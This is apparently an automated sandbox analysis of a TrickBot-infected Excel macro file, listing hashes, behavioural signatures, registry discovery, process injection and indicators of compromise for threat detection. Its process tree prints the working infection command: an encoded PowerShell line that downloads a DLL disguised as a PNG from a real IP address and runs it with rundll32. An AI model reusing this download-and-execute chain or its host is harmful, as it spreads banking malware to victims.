RNP-00152.xlsm

General

Target: RNP-00152.xlsm
Filesize: 87KB
Completed: 21-10-2021 15:14
Score: 10/10
MD5: 7ac2366ab4515b9f37be3187deea9bc0
SHA1: c4cee812f0fb97c510e149a28c1a55b6c5da2c9e
SHA256: 0b149fc1f48da1d2c02d778be120427483403cd7519fc7f69e741288b120cb9d

Malware Config (extracted)

Family: trickbot
Version: 100019
Botnet: rob136
C2:

Attributes
  • autorun: Name:pwgrabb, Name:pwgrabc
  • ecc_pubkey.base64
Signatures (12)

  • Process spawned unexpected child process
    cmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4676 | 3032 | cmd.exe | EXCEL.EXE

  • Trickbot

    Description

    Developed in 2016, TrickBot is one of the more recent banking Trojans.

  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow | pid | process
    41 | 1508 | powershell.exe

  • Downloads MZ/PE file

  • Loads dropped DLL
    rundll32.exe

    Reported IOCs

    pid | process
    1240 | rundll32.exe

  • Checks processor information in registry
    EXCEL.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE

  • Enumerates system info in registry
    EXCEL.EXE

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    pid | process
    3032 | EXCEL.EXE

  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pid | process
    1508 | powershell.exe (3 events)

  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, wermgr.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1508 | powershell.exe
    Token: SeDebugPrivilege | 4556 | wermgr.exe

  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    pid | process
    3032 | EXCEL.EXE (12 events)

  • Suspicious use of WriteProcessMemory
    EXCEL.EXE, cmd.exe, rundll32.exe, rundll32.exe

    Reported IOCs

    description | pid | process | target process
    PID 3032 wrote to memory of 4676 | 3032 | EXCEL.EXE | cmd.exe (2 events)
    PID 4676 wrote to memory of 1508 | 4676 | cmd.exe | powershell.exe (2 events)
    PID 4676 wrote to memory of 1368 | 4676 | cmd.exe | rundll32.exe (2 events)
    PID 1368 wrote to memory of 1240 | 1368 | rundll32.exe | rundll32.exe (3 events)
    PID 1240 wrote to memory of 1736 | 1240 | rundll32.exe | cmd.exe (3 events)
    PID 1240 wrote to memory of 4556 | 1240 | rundll32.exe | wermgr.exe (4 events)
Processes (7)
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RNP-00152.xlsm"
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c start /B /WAIT powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGMAbABiAC4AZABsAGwAIgA= & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:4676
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGMAbABiAC4AZABsAGwAIgA=
        (the -enc argument is base64 of UTF-16LE text and decodes to: Invoke-WebRequest -Uri "http://45.86.65.197/images/subzero.png" -OutFile "C:\ProgramData\clb.dll", i.e. the "image" fetched is the DLL that rundll32.exe then loads)
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:1508
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
        Suspicious use of WriteProcessMemory
        PID:1368
        • C:\Windows\SysWOW64\rundll32.exe
          C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
          Loads dropped DLL
          Suspicious use of WriteProcessMemory
          PID:1240
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe
            PID:1736
          • C:\Windows\system32\wermgr.exe
            C:\Windows\system32\wermgr.exe
            Suspicious use of AdjustPrivilegeToken
            PID:4556
MITRE ATT&CK Matrix

Discovery: Query Registry, System Information Discovery

Downloads
  • C:\ProgramData\clb.dll (also recorded as \ProgramData\clb.dll)
    MD5: d0a80e47fefaecb2f3e020fecf8288b7
    SHA1: 06267a23e36f50b2f4f14d668190465a98d5cf91
    SHA256: 9c0b5647a38a04a289b926c143cde952b1a5869a60ebfbe383ec5231aae750d2
    SHA512: b2f2c1860da49fb59e8e91542ef0f2c7788a72a44f88f1dbe83bd63cbe17bc4c200f9b77fd78d83ac1dbc1ac45e2ac1e788ebd364689e6ff28cb5ddb2f13f5e7